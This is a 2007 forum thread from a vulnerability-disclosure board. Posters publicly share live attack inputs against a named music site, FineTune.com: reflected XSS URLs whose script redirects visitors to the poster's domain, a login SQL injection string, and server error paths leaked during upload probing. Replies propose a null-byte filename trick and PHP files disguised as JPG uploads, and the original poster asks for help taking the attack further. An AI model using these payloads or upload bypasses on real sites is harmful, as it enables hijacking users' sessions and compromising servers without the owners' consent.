Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Fine Tune XSS Holes, And Need Further Assistance
Date: March 13, 2007 10:38AM

I was looking at their FineTune.com's Wii music player, but I was on the computer, and just figured I check out the packets I was getting from the site to see if anything could be played with.

Their artist search:
http://www.finetune.com/api/search.php?type=artist&term=<script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>&n=100&start=0&u=58AD5586C1E347828E618A80901DC04F&t=F450253AE98942E48618C55D2F6D5AFD

Their artist song menu on the main page:
http://www.finetune.com/content/artistRadio.php?st="><script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>

Their sign-in page:
http://www.finetune.com/content/signin.php?u="><script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>#

Their login page is vulnerable to some form of SQL injection, but I don't play around with SQL enough to really want to bother. It's possible to login to a non-existant account with the usual: a' or 'a'='a'/*

I tried to inject a small amount of PHP into their image uploading areas, but PHP isn't my strong point. I received errors on both the playlist image, and user image uploads. Perhaps someone can use this information to form some kind of image to bypass their functions. If it helps here's an example of when I tried to end their upload function.

Warning: getimagesize() [function.getimagesize]: Read error! in D:\www\profileImg_id.php on line 58

Warning: getimagesize() [function.getimagesize]: Read error! in D:\www\profileImg_id.php on line 59

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 162

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 173

Warning: imagedestroy(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 180

Warning: Cannot modify header information - headers already sent by (output started at D:\www\profileImg_id.php:58) in D:\www\profileImg_id.php on line 185


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: trev
Date: March 13, 2007 12:10PM

No SQL injection there, they will simply show you a blank page if you use ' in the user name but you are not logged in. Guess it is a precaution measure.

Edit: You could probably upload this image and use it as XSS for IE users.
Edit2: On the other hand, "imagecopyresampled" probably means that they will convert this image and remove any comments while doing so.



Edited 3 time(s). Last edit at 03/13/2007 12:18PM by trev.

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Date: March 14, 2007 12:37AM

Thanks. I wasn't sure about the SQL injection as I don't use it. I've read many injection articles to learn about it, but never physically used SQL.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: jungsonn
Date: March 15, 2007 08:44AM

It seems they read the image and build a thumbnail from it: imagecopyresampled() most of the time they make it a little smaller with it by resampling the image.

Have you tried to insert nulls?

like: c:\desktop\image.php%00.jpg

I guess that won't work cause they are running some image checks, but you can try top upload php files as JPG's. Sometimes it works.

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: FR3DC3RV
Date: March 15, 2007 12:22PM

It's strange but i managed to do SQL Injection.
I inserted:
Username: 'a
Password: 'a

And i logged in into a blank account.
Very strange.

-------------------------------
http://fr3dc3rv.blogspot.com

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: trev
Date: March 15, 2007 01:13PM

FR3DC3RV, see above - this isn't really SQL injection. If you have an ' in the user name they make it appear like you logged in, probably just to waste your time.

Options: ReplyQuote
Re: Fine Tune XSS Holes, And Need Further Assistance
Date: March 15, 2007 02:56PM

Perhaps it's just some form of an error? I had the same result, and attempted to utilize their functions, but couldn't.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote


Sorry, only registered users may post in this forum.